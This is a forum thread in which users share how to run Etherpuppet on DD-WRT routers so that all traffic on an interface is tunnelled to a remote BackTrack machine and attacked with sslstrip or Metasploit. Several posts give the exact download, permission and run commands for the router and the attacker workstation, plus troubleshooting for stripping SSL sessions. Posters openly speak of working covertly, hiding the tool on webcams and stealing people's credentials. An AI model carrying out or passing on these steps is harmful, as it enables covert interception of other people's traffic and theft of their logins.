dd-wrt redirecting traffic to a sslstrip box

[thaijames]

I finally got some spare time to work on this and got this working.

The software that will do this is etherpuppet.

The developer has both a regular linux version that can be used in backtrack and a linksys router version that can be run on the router.

By installing Etherpuppet on the linksys router, you can send all traffic from a chosen interface to a remote workstation so that it can be manipulated and sent back.

SSL strip worked fine on the traffic on both of my DD-WRT routers.
And so did any other program that I tried, for example metasploit.
I used the br0:0 interface on the router

However I tried another a couple of other DD-WRT routers (older ones), which did not have the br0:0 interface, and etherpuppet could not keep the connection. Could have something to do with the older version of DD-WRT or it could just be the different chipset. Mine are the Asus PN16 and WGL

I am still trying to figure out how to start an br0:0 interface or what interface besides br0:0 will work on these other routers as I had no problem running etherpuppet on them.

Also etterpuppet works great connecting two workstations this way.
I am not sure why it is not included in backtrack considering it is such a useful tool!

Sample command lines:

On linksys router:
etterpuppet -s 888 -i br0:0
# This makes the br0:0 interface available on port 888 for any computer to connect and use.

On backtrack:
etterpuppet -c 192.168.0.xxx:888 -m -I myinterface
# This tells it to connect to an IP address and port number in master mode and create a new interface.

remember to use ifconfig myinterface up
to bring up your new interace

after downloading:
just rename etherpuppet-mipsel to anything, upload it to you router (chmod 777) and run it.

For the linux version, you need to compile it for backtrack, which is really easy and instructions are on the website

any of you figured out the prerouted forwarding part for the dd-wrt? i thought i had it with http redirect in the hotspot tab but havent gotten it to work it may be meant for just within the network while im trying to send all packets over the net to a proxy. i cant imagine it should be so hard to figure out how to forward everything outside the lan to a proxy but after weeks i still cant get it working no matter what i try.

I don't have any python code here yet but i'll give you that soon.

For the SD hack, it's ok for my part but a question persist :

How do you add more RAM and usb as extra storage ?
(WRT54G?)

I don't think you can add more RAM. As far as the USB, the router either comes with it or not. The SD hack is not so difficult and would give you all the storage you need.

Better just to get a better router with more ram. I am using the Asus N16 with 128 MB Ram, USB and a faster CPU. There may be some newer ones out there.

Sorry, this is a double post please delete

[bromhexine]

wow this sounds really exciting! can i get some more help on setting this up on the dd-wrt end? not sure how to execute and set it up im able to ssh in with putty to exectute commands and use winscp to upload the file but im still unsure how to get it up and running.something about enabling something in the router or setting up dirs and permissions? thanks!

[thaijames]

I will try to do a proper tutorial when I have more time. in the meantime
Here is what I do:

#go the the tmp dir
cd /tmp

#Download the file
wget http://www.secdev.org/projects/ether...rpuppet-mipsel

# give it run permissions
chmod 777 etherpuppet-mipsel

# run it
etherpuppet-mipsel -s 999 -i br0

#Run on your pc:
etherpuppet -c xxx.xxx.xxx.xxx:999 -m -I myinterface
ifconfig myinterface up

I am doing some more experiments and it works on other devices besides router. For example the power PC version runs on dreambox Satelite Receivers. Also works on my webcam! Scary the places that you can hide these things!

wow this sounds really exciting! can i get some more help on setting this up on the dd-wrt end? not sure how to execute and set it up im able to ssh in with putty to exectute commands and use winscp to upload the file but im still unsure how to get it up and running.something about enabling something in the router or setting up dirs and permissions? thanks!

[bl0tch]

thank you so much

having trouble verifying if sslstrip is actually working. do i use the same settings as when doing arpspoof on my own lan and forwarding port 80 to 10000? or is there an extra step ive missed in forwarding the right ports or interfaces? i definitely see traffic though just havent been able to collect any stripped ssl sessions. i should mention im doing this overseas and thats probably not the best idea if working covert because google.com now goes to google.co.uk instead of google.ca as well anything thats done n the other end goes through you so if they're joining al qaida etc then you may have some problems.

[bromhexine]

biotch try not arp spoofing and dont flip machine into forwarding mode.

[dexter1978]

has anyone been able to get this working? i can see the traffic on the other end but i cant figure out how to intercept with sslstrip i've tried everything it seems.

[orgcandman]

Wish I had seen this thread earlier. There's already a decent project which does a lot of the stuff you'll want to do called Jasager. You might want to google 'hak5 pineapple', or 'jasager'. It's standard is run on the Fon, a pretty sweet little board, with, I think, 8MB of storage total on it; running a stripped version of linux + wifi "spoofing" tools. IE: it responds affirmatively to wireless host requests, and attempts to service requests for them.

The reason it's called the 'pineapple' is because the Hak5 group showcased a version of it running off of 4 AA batteries, all fit inside a cup that looked like a pineapple. Basically, no one would ever know you were walking around with it, and you could steal all their credentials if you had the right rig.